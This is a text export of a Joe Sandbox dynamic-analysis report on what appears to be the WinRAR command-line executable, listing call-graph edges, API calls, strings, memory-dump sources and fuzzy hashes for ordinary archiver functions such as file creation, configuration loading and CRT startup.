39484->39486 39485->39486 39489 7ff64feb2518 39485->39489 39487 7ff64feb252f FreeLibrary 39486->39487 39488 7ff64feb2535 39486->39488 39487->39488 39488->39472 39489->39486 39490 7ff64feab0fc 39509 7ff64feaaa8c 39490->39509 39494 7ff64feab123 __scrt_acquire_startup_lock 39495 7ff64feab148 39494->39495 39565 7ff64feab52c 7 API calls __scrt_fastfail 39494->39565 39499 7ff64feab169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39495->39499 39517 7ff64feb472c 39495->39517 39498 7ff64feab16d 39499->39498 39500 7ff64feab1f7 39499->39500 39566 7ff64feb2574 35 API calls FindHandlerForForeignException 39499->39566 39521 7ff64feb3fc4 39500->39521 39507 7ff64feab220 39567 7ff64feaac64 8 API calls 2 library calls 39507->39567 39510 7ff64feaaaae __isa_available_init 39509->39510 39568 7ff64feae2f8 39510->39568 39516 7ff64feaaab7 39516->39494 39564 7ff64feab52c 7 API calls __scrt_fastfail 39516->39564 39519 7ff64feb4744 39517->39519 39518 7ff64feb4766 39518->39499 39519->39518 39617 7ff64feab010 39519->39617 39522 7ff64feb3fd4 39521->39522 39524 7ff64feab20c 39521->39524 39702 7ff64feb3c84 39522->39702 39525 7ff64fe87e20 39524->39525 39734 7ff64fe9b470 GetModuleHandleW 39525->39734 39531 7ff64fe87e58 SetErrorMode GetModuleHandleW 39532 7ff64fe948cc 21 API calls 39531->39532 39533 7ff64fe87e7d 39532->39533 39534 7ff64fe93e48 137 API calls 39533->39534 39535 7ff64fe87e90 39534->39535 39536 7ff64fe63d3c 126 API calls 39535->39536 39537 7ff64fe87e9c 39536->39537 39538 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39537->39538 39539 7ff64fe87ead 39538->39539 39540 7ff64fe87ebf 39539->39540 39541 7ff64fe63f18 70 API calls 39539->39541 39542 7ff64fe64d1c 157 API calls 39540->39542 39541->39540 39543 7ff64fe87ed6 39542->39543 39544 7ff64fe87eef 39543->39544 39545 7ff64fe66ad0 154 API calls 39543->39545 39546 7ff64fe64d1c 157 API calls 39544->39546 39547 7ff64fe87ee7 39545->39547 39548 7ff64fe87eff 39546->39548 39549 
7ff64fe64e48 160 API calls 39547->39549 39550 7ff64fe87f0d 39548->39550 39552 7ff64fe87f14 39548->39552 39549->39544 39551 7ff64fe9b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39550->39551 39551->39552 39553 7ff64fe64888 58 API calls 39552->39553 39554 7ff64fe87f57 39553->39554 39555 7ff64fe64fd0 268 API calls 39554->39555 39556 7ff64fe87f5f 39555->39556 39557 7ff64fe87f9e 39556->39557 39558 7ff64fe87f8c 39556->39558 39562 7ff64feab684 GetModuleHandleW 39557->39562 39559 7ff64fe9b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39558->39559 39560 7ff64fe87f93 39559->39560 39560->39557 39561 7ff64fe9b57c 14 API calls 39560->39561 39561->39557 39563 7ff64feab698 39562->39563 39563->39507 39564->39494 39565->39495 39566->39500 39567->39498 39569 7ff64feae301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39568->39569 39581 7ff64feaeb08 39569->39581 39572 7ff64feaaab3 39572->39516 39576 7ff64feb45e4 39572->39576 39574 7ff64feae318 39574->39572 39588 7ff64feaeb50 DeleteCriticalSection 39574->39588 39577 7ff64feb9d4c 39576->39577 39578 7ff64feaaac0 39577->39578 39605 7ff64feb66c0 39577->39605 39578->39516 39580 7ff64feae32c 8 API calls 3 library calls 39578->39580 39580->39516 39582 7ff64feaeb10 39581->39582 39584 7ff64feaeb41 39582->39584 39585 7ff64feae30b 39582->39585 39589 7ff64feae678 39582->39589 39594 7ff64feaeb50 DeleteCriticalSection 39584->39594 39585->39572 39587 7ff64feae8a4 8 API calls 3 library calls 39585->39587 39587->39574 39588->39572 39595 7ff64feae34c 39589->39595 39592 7ff64feae6cf InitializeCriticalSectionAndSpinCount 39593 7ff64feae6bb 39592->39593 39593->39582 39594->39585 39596 7ff64feae3b2 39595->39596 39597 7ff64feae3ad 39595->39597 39596->39592 39596->39593 39597->39596 39598 7ff64feae3e5 LoadLibraryExW 39597->39598 39603 7ff64feae47a 39597->39603 39604 7ff64feae458 FreeLibrary 39597->39604 39598->39597 39600 7ff64feae40b GetLastError 39598->39600 39599 7ff64feae489 
GetProcAddress 39599->39596 39601 7ff64feae4a1 39599->39601 39600->39597 39602 7ff64feae416 LoadLibraryExW 39600->39602 39601->39596 39602->39597 39603->39596 39603->39599 39604->39597 39616 7ff64feb6938 EnterCriticalSection 39605->39616 39607 7ff64feb66d0 39608 7ff64feb8050 32 API calls 39607->39608 39609 7ff64feb66d9 39608->39609 39611 7ff64feb64d0 34 API calls 39609->39611 39615 7ff64feb66e7 39609->39615 39610 7ff64feb6998 abort LeaveCriticalSection 39613 7ff64feb66f3 39610->39613 39612 7ff64feb66e2 39611->39612 39614 7ff64feb65bc GetStdHandle GetFileType 39612->39614 39613->39577 39614->39615 39615->39610 39618 7ff64feab020 pre_c_initialization 39617->39618 39638 7ff64feb2b00 39618->39638 39620 7ff64feab02c pre_c_initialization 39644 7ff64feaaad8 39620->39644 39622 7ff64feab045 39623 7ff64feab0b5 39622->39623 39624 7ff64feab049 _RTC_Initialize 39622->39624 39681 7ff64feab52c 7 API calls __scrt_fastfail 39623->39681 39649 7ff64feaace0 39624->39649 39626 7ff64feab0bf 39682 7ff64feab52c 7 API calls __scrt_fastfail 39626->39682 39629 7ff64feab05a pre_c_initialization 39652 7ff64feb3b0c 39629->39652 39630 7ff64feab0ca __scrt_initialize_default_local_stdio_options 39630->39519 39633 7ff64feab06a 39680 7ff64feab7dc RtlInitializeSListHead 39633->39680 39635 7ff64feab06f pre_c_initialization __InternalCxxFrameHandler 39636 7ff64feb4818 pre_c_initialization 35 API calls 39635->39636 39637 7ff64feab09a pre_c_initialization 39636->39637 39637->39519 39639 7ff64feb2b11 39638->39639 39640 7ff64feb2b19 39639->39640 39683 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 39639->39683 39640->39620 39642 7ff64feb2b28 39684 7ff64feb4e1c 31 API calls _invalid_parameter_noinfo 39642->39684 39645 7ff64feaab96 39644->39645 39648 7ff64feaaaf0 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 39644->39648 39685 7ff64feab52c 7 API calls __scrt_fastfail 39645->39685 39647 7ff64feaaba0 39648->39622 39686 7ff64feaac90 39649->39686 39651 7ff64feaace9 39651->39629 39653 
7ff64feb3b40 39652->39653 39654 7ff64feb3b2a 39652->39654 39693 7ff64feb9370 39653->39693 39691 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 39654->39691 39657 7ff64feb3b2f 39692 7ff64feb4e1c 31 API calls _invalid_parameter_noinfo 39657->39692 39659 7ff64feb3b72 39697 7ff64feb38ec 35 API calls pre_c_initialization 39659->39697 39661 7ff64feab066 39661->39626 39661->39633 39663 7ff64feb3b9c 39698 7ff64feb3aa8 15 API calls 2 library calls 39663->39698 39665 7ff64feb3bb2 39666 7ff64feb3bba 39665->39666 39667 7ff64feb3bcb 39665->39667 39699 7ff64feb4f3c 15 API calls _invalid_parameter_noinfo 39666->39699 39700 7ff64feb38ec 35 API calls pre_c_initialization 39667->39700 39670 7ff64feb3be7 39672 7ff64feb3c30 39670->39672 39673 7ff64feb3c17 39670->39673 39678 7ff64feb3bbf 39670->39678 39671 7ff64feb4a74 __free_lconv_num 15 API calls 39671->39661 39676 7ff64feb4a74 __free_lconv_num 15 API calls 39672->39676 39674 7ff64feb4a74 __free_lconv_num 15 API calls 39673->39674 39675 7ff64feb3c20 39674->39675 39677 7ff64feb4a74 __free_lconv_num 15 API calls 39675->39677 39676->39678 39679 7ff64feb3c2c 39677->39679 39678->39671 39679->39661 39681->39626 39682->39630 39683->39642 39684->39640 39685->39647 39687 7ff64feaacbf 39686->39687 39689 7ff64feaacb5 _onexit 39686->39689 39690 7ff64feb4434 34 API calls _onexit 39687->39690 39689->39651 39690->39689 39691->39657 39692->39661 39694 7ff64feb937d 39693->39694 39696 7ff64feb3b45 GetModuleFileNameA 39693->39696 39701 7ff64feb91b0 48 API calls 5 library calls 39694->39701 39696->39659 39697->39663 39698->39665 39699->39678 39700->39670 39701->39696 39703 7ff64feb3ca1 39702->39703 39704 7ff64feb3c98 39702->39704 39703->39524 39704->39703 39708 7ff64feb3ccc 39704->39708 39709 7ff64feb3caa 39708->39709 39710 7ff64feb3ce5 39708->39710 39709->39703 39720 7ff64feb3e78 17 API calls 2 library calls 39709->39720 39711 7ff64feb9370 pre_c_initialization 48 API calls 39710->39711 39712 7ff64feb3cea 39711->39712 39721 7ff64feb978c 
APIs
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
• Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction ID: 98d8c2e07a39d42b75fd621679c1fde2f95a64d6ab006e371b4c1bb1f168122c
• Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction Fuzzy Hash: 99014B26B0C69092FB40AB16A94432D6B62FBC4FD1F5A8431EF4D87B68CE7DD9468700
APIs
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57e708d172b4f9bc7610111e00af6b160641e0151f479ce57ca39fdc54f6c8f6
• Instruction ID: ec7fe3c222880d23af7d8d44ffc8802c2a37f7e79474e4188d8231b855ca4124
• Opcode Fuzzy Hash: 57e708d172b4f9bc7610111e00af6b160641e0151f479ce57ca39fdc54f6c8f6
• Instruction Fuzzy Hash: B6719F32A0968596D744FF2AE8052ED33E1FBC8F98F044135DB5D8B399DF78A4518790
Control-flow Graph
APIs
Strings
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
• Instruction ID: 087dc093614d45651639b7236ba59b0466f37fafac88372b4676f3ed134cf50b
• Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
• Instruction Fuzzy Hash: 4B22BE62A1D682E5EB20FB15D454AFA23A1FFC4785F808136EA4EC76D9EF2CE544C350
Control-flow Graph
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
• Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: 058afe0850c41108d8beb08c3fbbb53ab0baf1114d46bd2fdf51c63210882d69
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: 4AC19561B1C686A4FA64BF25C8551FC1391BFD1B86F846135FB4ECB6DADE2CE5008311

Control-flow Graph
control_flow_graph for the function at 7ff64fe97f24 (rendered graph not recoverable from the text export): basic blocks 7ff64fe97f24-7ff64fe98093. Imported APIs called: GetProcAddressForCaller and GetProcAddress (block 7ff64fe97f7e), GetCurrentProcessId (block 7ff64fe9805c). Intra-module calls: 7ff64fe9b3f0, 7ff64fe6ca6c, 7ff64fe6cda4, 7ff64fe6ca40.
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
• Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: AddressProc$CallerCurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 1389829785-2207617598
• Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction ID: 5ff17579f6f4625e7be5a14b323babceaa2d1bc7fd3ffcbf9054e091c6d0d9cf
• Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction Fuzzy Hash: 7D417C21A0CB86B1FA44FB16B8009796BA2BFC4BD6F481135DD5E877A4DE7DE0468320

Control-flow Graph
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
• Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
• String ID:
• API String ID: 552178382-0
• Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction ID: dabb7f9d29ff028aeb105e05f75f37b6422b4c804011dda24342c0c00835b5c6
• Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction Fuzzy Hash: EF318C21E0C283A2FA15BB24E4263B923E1BFD578AF440436EA4DCB2D7DE2CE404C751

Control-flow Graph
control_flow_graph for the function at 7ff64fe71e80 (rendered graph not recoverable from the text export): basic blocks 7ff64fe71e80-7ff64fe7204b. Imported APIs called: CreateFileW (block 7ff64fe71ecb), GetLastError (block 7ff64fe71f59), CreateFileW and GetLastError again on the retry path (block 7ff64fe71f78), SetFileTime (block 7ff64fe71fd9). Intra-module calls: 7ff64feaa5a0, 7ff64fe84534, 7ff64fe9a9e8, 7ff64feaa610.
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: rar.ini$switches=$switches_%ls=
• API String ID: 233258989-2235180025
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
• String ID: rar.lng
• API String ID: 553376247-2410228151
APIs
• SHGetMalloc.SHELL32(?,00000800,?,00007FF64FE84432,?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE840C4
• SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE840DF
• SHGetPathFromIDListW.SHELL32 ref: 00007FF64FE840F1
  • Part of subcall function 00007FF64FE73458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF64FE8413F,?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE734A0
  • Part of subcall function 00007FF64FE73458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF64FE8413F,?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE734D5
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
APIs
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID:
• API String ID: 3094578987-0
APIs
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: ConsoleFileHandleModeType
• String ID:
• API String ID: 4141822043-0
APIs
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: CharEnvironmentExpandStrings
• String ID:
• API String ID: 4052775200-0
APIs
• CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF64FE67EBE,00000000,00000000,00000000,00000000,00000007,00007FF64FE67C48), ref: 00007FF64FE71B8D
• CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF64FE67EBE,00000000,00000000,00000000,00000000,00000007,00007FF64FE67C48), ref: 00007FF64FE71BD7
Memory Dump Source
• Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                              • Instruction ID: b91b5a2491a793558c8cf35c916e97a1ae7c26827291cf8f26cada1071d8aaec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F31E062A1C78286E760BF20E4053A927A0FB81BBAF105334DA68876C6DF7DD5858700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                              • Instruction ID: 063c2eb860c08ebeb263312688ff9fd8abc09bc72f4a5985d1c9e05806caa66f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D401E521A1D69192EA647B26A40006963A2FFC4BF1F149631EF2DC3BD7CF3CE4418B00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF64FE7305D,?,?,?,?,?,?,?,?,00007FF64FE84126,?,?,?,?,00000800), ref: 00007FF64FE730F0
                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF64FE84126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF64FE73119
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
